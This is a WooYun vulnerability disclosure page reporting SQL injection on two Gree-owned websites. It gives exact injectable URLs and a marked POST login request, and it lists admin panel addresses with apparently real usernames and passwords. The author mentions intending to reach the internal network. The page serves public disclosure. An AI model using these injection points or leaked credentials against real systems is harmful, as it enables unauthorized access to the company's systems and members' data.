当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159324

漏洞标题:格力某站SQL注入漏洞会员总数223027

相关厂商:格力电器

漏洞作者: yangge

提交时间:2015-12-09 11:14

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

格力某站注入漏洞,本来是打算搞内网的,但是写不了shell。

详细说明:

http://www.tosot.com.cn/ TOSOT(大松)是格力电器旗下生活电器品牌,涵盖了净水机、电暖器、电风扇、电饭煲、电磁炉、电压力锅、加湿器、干衣除湿机和空气净化器等生活家电新品。为今后产品线上的发展做好规划。
注入点http://www.tosot.com.cn/about.php?id=1&op=1
payload

1.PNG


后台链接http://www.tosot.com.cn/administrator/default.php 需要IE浏览器 admin 2611167
重点是下面这个网站
http://1hz.gree.com/
注入点
POST /user/?t=login&ram=0.5627493050415069 HTTP/1.1
Host: 1hz.gree.com
Content-Length: 22
Accept: */*
Origin: http://1hz.gree.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://1hz.gree.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _ga=GA1.2.39647721.1449454227; ASPSESSIONIDQQQARART=LEDPEAICBKIOGBOJEMOMCOMD; __utmt=1; __utma=66613294.39647721.1449454227.1449454227.1449466669.2; __utmb=66613294.1.10.1449466669; __utmc=66613294; __utmz=66613294.1449454227.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
name=admi&password=123*
password那里
payload

2.PNG


后台http://1hz.gree.com/control 账号admin gree1hz
进去以后看首页

3.PNG


4.PNG


漏洞证明:

http://www.tosot.com.cn/ TOSOT(大松)是格力电器旗下生活电器品牌,涵盖了净水机、电暖器、电风扇、电饭煲、电磁炉、电压力锅、加湿器、干衣除湿机和空气净化器等生活家电新品。为今后产品线上的发展做好规划。
注入点http://www.tosot.com.cn/about.php?id=1&op=1
payload

1.PNG


后台链接http://www.tosot.com.cn/administrator/default.php 需要IE浏览器 admin 2611167
重点是下面这个网站
http://1hz.gree.com/
注入点
POST /user/?t=login&ram=0.5627493050415069 HTTP/1.1
Host: 1hz.gree.com
Content-Length: 22
Accept: */*
Origin: http://1hz.gree.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://1hz.gree.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: _ga=GA1.2.39647721.1449454227; ASPSESSIONIDQQQARART=LEDPEAICBKIOGBOJEMOMCOMD; __utmt=1; __utma=66613294.39647721.1449454227.1449454227.1449466669.2; __utmb=66613294.1.10.1449466669; __utmc=66613294; __utmz=66613294.1449454227.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
name=admi&password=123*
password那里
payload

2.PNG


后台http://1hz.gree.com/control 账号admin gree1hz
进去以后看首页

3.PNG


4.PNG


修复方案:

版权声明:转载请注明来源 yangge@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价